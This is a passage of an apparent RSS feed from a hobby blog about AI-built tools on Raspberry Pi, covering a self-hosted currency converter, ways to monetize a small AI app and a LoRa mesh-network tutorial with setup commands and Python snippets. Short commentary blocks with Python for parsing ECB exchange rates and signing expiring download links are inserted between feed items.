daily&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This dramatically reduced development time and produced clean, efficient code suited for low-power devices.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Automatic Updates via Raspberry 
Pi&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The converter retrieves fresh exchange rates from the European Central Bank.&lt;br&gt;A daily cron job on the Raspberry Pi:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;&lt;p&gt;downloads the newest rates&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;writes them to rates.json&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;updates timestamps&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;keeps the tool fully autonomous&lt;/p&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;No external database or manual updates are required.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Hosting on Raspberry Pi&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The entire service runs on a &lt;strong&gt;Raspberry Pi 2&lt;/strong&gt; using Apache2 and Let’s Encrypt SSL. Even this older Pi model easily handles:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;real-time conversions&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;multi-language UI&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;dark mode&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;fast static hosting&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;AdSense integration&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This proves that small devices can power real, production-ready web applications when the code is optimized.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Multi-Language Support&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The interface includes translations for:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;English&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Bulgarian&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Czech&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Polish&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Hungarian&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Romanian&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Turkish&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The converter automatically selects the correct language using browser settings (and optionally IP), allowing people from different countries to use it in their native language.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Design and Speed Optimization&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The converter is built as a single 
static HTML file:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;no frameworks&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;no server-side rendering&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;almost instant load time&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;excellent mobile performance&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;optional AMP version&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This approach improves SEO and ensures the site works smoothly even on older phones.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Part of a Larger AI + Raspberry Pi Project&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;asky.uk focuses on projects created with or enhanced by AI.&lt;br&gt;This converter is part of a broader effort to:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;build small AI-assisted tools&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;host them on Raspberry Pi devices&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;demonstrate how modern AI can simplify coding, automation, and deployment&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;It shows how AI can turn a simple idea into a complete, autonomous service running entirely on your own hardware.&lt;/p&gt;&lt;h2&gt;&lt;strong&gt;Conclusion&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;The euro currency converter is a practical example of what can be achieved when AI technology and Raspberry Pi hardware are combined.&lt;br&gt;It is fast, multilingual, self-updating, and completely self-hosted — a perfect demonstration of the direction in which asky.uk continues to evolve:&lt;/p&gt;&lt;p&gt;&lt;strong&gt;lightweight, intelligent, AI-built tools running on small, affordable hardware.&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;a rel="nofollow" 
href="https://asky.uk/convertor/"&gt;CONVERTOR&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://globalfintechseries.com/wp-content/uploads/AI-and-Machine-Learning_-Transforming-Payment-Systems-and-Global-Money-Exchange-4-960x720.jpg" style="height:440px; width:588px"&gt;&lt;/p&gt;</description>
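The daily cron job described above boils down to fetching the ECB reference-rate XML and flattening it into rates.json. Below is a minimal sketch of the parsing step, using a trimmed sample document so it runs without network access (the real feed layout may differ in detail):

```python
import json
import xml.etree.ElementTree as ET

# In the cron job this XML would be downloaded from the ECB daily
# reference-rate feed; a trimmed sample keeps the sketch self-contained.
SAMPLE = """<gesmes:Envelope xmlns:gesmes="http://www.gesmes.org/xml/2002-08-01"
    xmlns="http://www.ecb.int/vocabulary/2002-08-01/eurofxref">
  <Cube><Cube time="2025-11-28">
    <Cube currency="BGN" rate="1.9558"/>
    <Cube currency="CZK" rate="24.3"/>
  </Cube></Cube>
</gesmes:Envelope>"""

NS = "{http://www.ecb.int/vocabulary/2002-08-01/eurofxref}"

def parse_rates(xml_text):
    """Return {currency: EUR reference rate} from an ECB eurofxref document."""
    root = ET.fromstring(xml_text)
    return {c.get("currency"): float(c.get("rate"))
            for c in root.iter(NS + "Cube") if c.get("currency")}

if __name__ == "__main__":
    rates = parse_rates(SAMPLE)
    print(json.dumps(rates))  # what the cron job would write to rates.json
```

Writing the flattened dictionary to rates.json keeps the front-end a pure static page: the JavaScript converter only ever reads one small local file.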
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/102/built-powered-language-currency-converter-hosted-raspberry</guid>
<pubDate>Sat, 29 Nov 2025 21:47:43 +0000</pubDate>
</item>
<item>
<title>Have you tried Manus yet?</title>
<link>https://asky.uk/101/have-you-tried-manus-yet</link>
<description>&lt;p&gt;Manus is one of the most capable AI tools for carrying any of your projects through to a successful finish.&lt;/p&gt;&lt;p&gt;&lt;strong&gt;&lt;a rel="nofollow" href="https://manus.im/invitation/UZB1H0LZDHLS"&gt;MANUS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/101/have-you-tried-manus-yet</guid>
<pubDate>Sat, 15 Nov 2025 15:43:17 +0000</pubDate>
</item>
<item>
<title>Monetizing an Asky AI Bot</title>
<link>https://asky.uk/100/monetizing-a-asky-ai-bot</link>
<description>&lt;p&gt;Building an &lt;a rel="nofollow" href="https://asky.uk/76/welcome-to-asky-ai-raspberry-pi-2-power"&gt;&lt;strong&gt;AI-powered project&lt;/strong&gt; &lt;/a&gt;such as an HTML/CSS generator is fun, but turning it into a sustainable source of income requires clear monetization strategies. If you don’t want to rely solely on AdSense, here are practical alternatives that don’t require user accounts or heavy data collection (important for GDPR and privacy compliance).&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;1. &lt;strong&gt;One-Time Digital Product Sales&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Instead of subscriptions, you can package outputs as downloadable assets:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Static bundles&lt;/strong&gt;: pre-designed templates, CSS themes, or landing page packs.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Customized bundles&lt;/strong&gt;: the app generates a ZIP file tailored to the user’s description.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use Stripe Checkout, PayPal Buy Now, or Gumroad/Payhip for transactions.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Deliver via expiring download links (e.g., valid for 1 hour).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Price range: £1–£10 for small templates, £10–£30 for bundles.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This model is simple, requires minimal personal data, and is compatible with small traffic volumes.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;2. 
&lt;strong&gt;Freemium With Pay-Per-Use&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Keep the app free for light use, but charge for “power features”:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;More than 1–2 generations per day.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Access to advanced templates (responsive, dark/light modes).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Direct code download (instead of copy/paste).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Add a “Buy More Generations” button.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Stripe Payment Links can sell credits (e.g., 20 generations for £5).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;No accounts: you can deliver credits via ephemeral tokens, emailed codes, or even short-lived cookies.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;3. &lt;strong&gt;Premium API Access&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Your AI app could also work as a micro-API:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Example endpoint: &lt;code&gt;/generate_html?desc=blue+login+form&lt;/code&gt;.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Free for hobbyists (limited calls/day).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Paid tier for developers who want to integrate it into their own workflows.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Host the API behind RapidAPI or Stripe-based usage credits.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Good for attracting other programmers and SaaS builders.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This option scales better than selling static templates but requires stable uptime and rate-limiting.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;4. 
&lt;strong&gt;Pay-What-You-Want Donations (Enhanced)&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;While “donate” buttons are common, they can be made more compelling:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Offer a &lt;strong&gt;bonus file&lt;/strong&gt; or &lt;strong&gt;extended functionality&lt;/strong&gt; when someone donates (e.g., a premium template).&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Integrate BuyMeACoffee, Ko-fi, or Stripe’s “tip jar” feature.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Minimal dev work, no data storage.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Works best if you already have traffic from open-source communities or learners.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;5. &lt;strong&gt;Plugins &amp;amp; Marketplace Integrations&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Instead of only offering a web tool, wrap your AI generator into a product for existing ecosystems:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;WordPress plugin&lt;/strong&gt;: “Generate CSS blocks from plain English.”&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Shopify app&lt;/strong&gt;: “AI quick theme tweaks.”&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;VS Code extension&lt;/strong&gt;: “Generate HTML snippets in editor.”&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Start with a simple downloadable plugin.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Sell it as a one-time purchase (£10–£20) on marketplaces.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;This approach extends reach beyond your own site and makes revenue more stable.&lt;/p&gt;&lt;hr&gt;&lt;h2&gt;6. 
&lt;strong&gt;Fiverr / Upwork Automation&lt;/strong&gt;&lt;/h2&gt;&lt;p&gt;Turn the tool into a semi-passive service:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Create a Fiverr gig: “I’ll generate a responsive HTML/CSS template with AI.”&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Behind the scenes, clients interact with your tool instead of you coding manually.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Delivery can be automated: payment → webhook → file generation → delivery.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt; &lt;em&gt;Implementation&lt;/em&gt;:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Reuse the same code as your app, just wrap it for gig platforms.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Can generate £20–£200/month even at low traffic, depending on pricing.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Pricing Tips&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Low-friction pricing&lt;/strong&gt; (under £5) works best for instant purchases.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;&lt;strong&gt;Bundles&lt;/strong&gt; (£10–£30) are attractive for small business owners or students.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For developers, &lt;strong&gt;API credits&lt;/strong&gt; are more natural (£5–£15 per 1,000 requests).&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;h2&gt;Legal &amp;amp; Privacy Considerations&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;&lt;p&gt;Use Stripe, PayPal, or Gumroad — they handle payment security and compliance.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;Keep a minimal &lt;strong&gt;privacy policy&lt;/strong&gt;: clearly state that no personal data is stored.&lt;/p&gt;&lt;/li&gt;&lt;li&gt;&lt;p&gt;For EU/UK: digital product sales may be subject to VAT — keep that in mind if scale grows.&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;hr&gt;&lt;p&gt;Conclusion&lt;/p&gt;&lt;p&gt;AdSense may bring a trickle of revenue, but &lt;strong&gt;the real opportunity lies in direct monetization of what your AI app creates&lt;/strong&gt;. 
Selling small, useful digital products or offering pay-per-use access can generate anywhere from a few pounds to a few hundred pounds per month, all without user accounts or storing personal data.&lt;/p&gt;&lt;p&gt;Start simple: package one or two template bundles, add a “Buy Now” button, and deliver via expiring download links. Once you see traction, consider expanding into APIs, plugins, or marketplaces.&lt;/p&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://i.ibb.co/PZcsKqDL/Screenshot-2025-07-18-at-07-26-45-Asky-AI-Home.png" style="height:226px; width:772px"&gt;&lt;/p&gt;</description>
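The expiring download links suggested above can be built with nothing more than an HMAC over the filename plus an expiry timestamp; no accounts or database are needed. Here is a sketch with a hypothetical secret and URL scheme:

```python
import hashlib
import hmac
import time

SECRET = b"change-me"  # hypothetical server-side secret; load from config in practice

def make_link(filename, ttl_seconds=3600, now=None):
    """Build a signed, time-limited download URL for one file."""
    expires = int(now if now is not None else time.time()) + ttl_seconds
    payload = f"{filename}:{expires}".encode()
    sig = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    return f"/download/{filename}?expires={expires}&sig={sig}"

def verify(filename, expires, sig, now=None):
    """Accept only unexpired links whose signature matches."""
    current = now if now is not None else time.time()
    payload = f"{filename}:{expires}".encode()
    good = hmac.new(SECRET, payload, hashlib.sha256).hexdigest()
    return hmac.compare_digest(good, sig) and current < int(expires)
```

Because the expiry is inside the signed payload, a buyer cannot extend the link by editing the query string, and the server stores no per-customer state.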
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/100/monetizing-a-asky-ai-bot</guid>
<pubDate>Wed, 17 Sep 2025 07:57:36 +0000</pubDate>
</item>
<item>
<title>Building an AI-Powered LoRa Mesh Network on Raspberry Pi 5: A Community Communication Project for Small Villages</title>
<link>https://asky.uk/99/building-powered-raspberry-community-communication-villages</link>
<description>&lt;p&gt;In remote or underserved areas, reliable communication can be a challenge due to limited internet access or infrastructure. This project outlines how to create a small-scale, decentralized communication network using Raspberry Pi 5 boards equipped with LoRa (Long Range) modules. The network is designed to support 50-100 users in a small populated place, such as a village, enabling text-based messaging, data sharing, and basic alerts without relying on cellular or Wi-Fi networks.&lt;/p&gt;&lt;p&gt;&lt;img alt="" src="https://thepihut.com/cdn/shop/products/sx1268-lora-hat-for-raspberry-pi-433mhz-waveshare-wav-16804-30032679239875_800x.jpg?v=1646139975" style="height:800px; width:800px"&gt;&lt;br&gt;To add intelligence, we'll integrate AI capabilities on the Raspberry Pi 5 using lightweight models like TensorFlow Lite. The AI can handle tasks such as automated message routing, sentiment analysis for community alerts (e.g., detecting urgent messages), or even simple natural language processing (NLP) for chat moderation. LoRa's low-power, long-range capabilities (up to several kilometers in open areas) make it ideal for mesh networking, where devices relay messages to extend coverage.&lt;br&gt;&lt;br&gt;This setup assumes a mesh topology, where each user's device acts as a node, relaying data to others. 
For 50-100 users, you'll need multiple nodes, but we'll focus on building a single node prototype that can be replicated.&lt;br&gt;&lt;br&gt;&amp;nbsp;Key Benefits:&lt;br&gt;- Low cost: Each node costs around $100-150.&lt;br&gt;- Energy efficient: Suitable for solar-powered setups in off-grid areas.&lt;br&gt;- Privacy-focused: Decentralized, no central server required.&lt;br&gt;- Scalable: Easily expand by adding more nodes.&lt;br&gt;&lt;br&gt;&amp;nbsp; Estimated Range and Capacity:&amp;nbsp;&lt;br&gt;- LoRa can cover 2-10 km per hop depending on terrain and antenna.&lt;br&gt;- For 50-100 users, aim for 10-20 gateway nodes to handle traffic, with users connecting via simple LoRa-enabled devices (e.g., smartphones with LoRa adapters or dedicated handhelds).&lt;br&gt;&lt;br&gt;&amp;nbsp; Required Components&lt;br&gt;&lt;br&gt;For a single node (Raspberry Pi 5 as a gateway/router):&lt;br&gt;- Raspberry Pi 5 (4GB or 8GB model recommended for AI tasks).&lt;br&gt;- LoRa module: SX1276/SX1278-based HAT or breakout board (e.g., Dragino LoRa HAT or Waveshare SX1262).&lt;br&gt;- Antenna: High-gain outdoor antenna (5-9 dBi) for better range.&lt;br&gt;- Power supply: 5V/3A USB-C adapter; consider solar panels for remote deployment.&lt;br&gt;- Storage: 16GB+ microSD card with Raspberry Pi OS (Lite version for efficiency).&lt;br&gt;- Display/Keyboard (optional for setup): HDMI monitor and USB peripherals.&lt;br&gt;- Enclosure: Weatherproof case for outdoor use.&lt;br&gt;- Additional for AI: USB accelerator like Coral TPU (optional for faster inference).&lt;br&gt;&lt;br&gt;For user endpoints (simpler nodes):&lt;br&gt;- ESP32 or Arduino boards with LoRa modules (cheaper alternatives to full Pi setups for end-users).&lt;br&gt;- Mobile app integration: Use Bluetooth to connect smartphones to LoRa nodes.&lt;br&gt;&lt;br&gt;Total cost per gateway node: ~$120. 
Scale up by distributing simpler nodes to users.&lt;br&gt;&lt;br&gt;&amp;nbsp;Step-by-Step Instructions&lt;br&gt;&lt;br&gt;&amp;nbsp;Step 1: Hardware Assembly&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Set up the Raspberry Pi 5:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Insert the microSD card with Raspberry Pi OS installed (download from raspberrypi.com and flash using Raspberry Pi Imager).&lt;br&gt;&amp;nbsp; &amp;nbsp;- Connect the LoRa HAT/module to the Pi's GPIO pins. For Dragino HAT, align pins and secure.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Attach the antenna to the LoRa module's connector.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Power on the Pi and boot into the OS.&lt;br&gt;&lt;br&gt;2.&amp;nbsp; &amp;nbsp;Test Connections:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- SSH into the Pi (enable SSH in raspi-config).&lt;br&gt;&amp;nbsp; &amp;nbsp;- Verify LoRa module: Run `ls /dev` to check for `/dev/spidev0.0` (SPI interface).&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp;Step 2: Software Installation&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Update System:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;sudo apt update &amp;amp;&amp;amp; sudo apt upgrade -y&lt;br&gt;&amp;nbsp; &amp;nbsp;sudo apt install python3-pip git -y&lt;br&gt;&amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;2.&amp;nbsp; Install LoRa Libraries:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Use PyLoRa or LoRaWAN libraries. 
Clone a mesh networking library like Meshtastic (which supports LoRa for chat networks).&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;git clone https://github.com/meshtastic/Meshtastic-python.git&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;cd Meshtastic-python&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install -r requirements.txt&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- Alternatively, for custom setup: Install `RPi.GPIO` and `spidev`.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install RPi.GPIO spidev&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;3.&amp;nbsp; &amp;nbsp;Install AI Frameworks:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- TensorFlow Lite for edge AI:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;sudo apt install libatlas-base-dev -y&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install tflite-runtime&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- For NLP/sentiment analysis, add Hugging Face's Transformers (lite version):&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install transformers torch&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp;- Download a pre-trained model, e.g., DistilBERT for sentiment:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;from transformers import pipeline&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;classifier = pipeline('sentiment-analysis')&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; Step 3: Configure LoRa Mesh Network&lt;br&gt;1.&amp;nbsp; &amp;nbsp;Set Up LoRa Parameters:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Frequency: Use 433MHz, 868MHz, or 915MHz based on your region's regulations (check local laws).&lt;br&gt;&amp;nbsp; &amp;nbsp;- In code, configure spreading
factor (SF7-SF12) for range vs. speed trade-off. Higher SF for longer range but slower data.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Example Python script for basic send/receive:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```python&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;import time&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;import LoRa&amp;nbsp; # Assuming PyLoRa library&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora = LoRa.LoRa(verbose=False)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_mode(LoRa.MODE.STDBY)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_freq(915.0)&amp;nbsp; # Adjust frequency&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_spreading_factor(7)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;# Send message&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.write_payload([ord(c) for c in "Hello LoRa!"])&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;lora.set_mode(LoRa.MODE.TX)&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;time.sleep(1)&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;# Receive loop&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;while True:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if lora.received_packet():&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;payload = lora.read_payload()&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;print("".join(chr(b) for b in payload))&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&lt;br&gt;2.&amp;nbsp; &amp;nbsp;Implement Mesh Topology:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp;- Use libraries like PainlessMesh or adapt Meshtastic for LoRa.&lt;br&gt;&amp;nbsp; &amp;nbsp;- Each node broadcasts its ID and relays messages if not the destination.&lt;br&gt;&amp;nbsp; &amp;nbsp;- For 50-100 users: Limit hops to 3-5 to avoid latency. 
Use channel hopping to reduce interference.&lt;br&gt;&lt;br&gt;3.&amp;nbsp; &amp;nbsp;Integrate AI:&amp;nbsp;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Message Routing with AI: Use a simple ML model to predict optimal routes based on signal strength history.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Collect data: Log RSSI (Received Signal Strength Indicator) from LoRa packets.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Train a basic model (e.g., scikit-learn on Pi):&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;pip3 install scikit-learn&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;```&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Example: Linear regression for path prediction.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;- Sentiment Analysis for Alerts: Analyze incoming messages.&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;```python&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;from transformers import pipeline&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;classifier = pipeline('sentiment-analysis', model='distilbert-base-uncased-finetuned-sst-2-english')&lt;br&gt;&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;def analyze_message(msg):&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;result = classifier(msg)[0]&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;if result['label'] == 'NEGATIVE' and result['score'] &amp;gt; 0.8:&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;return "Alert: Potential emergency!"&lt;br&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; 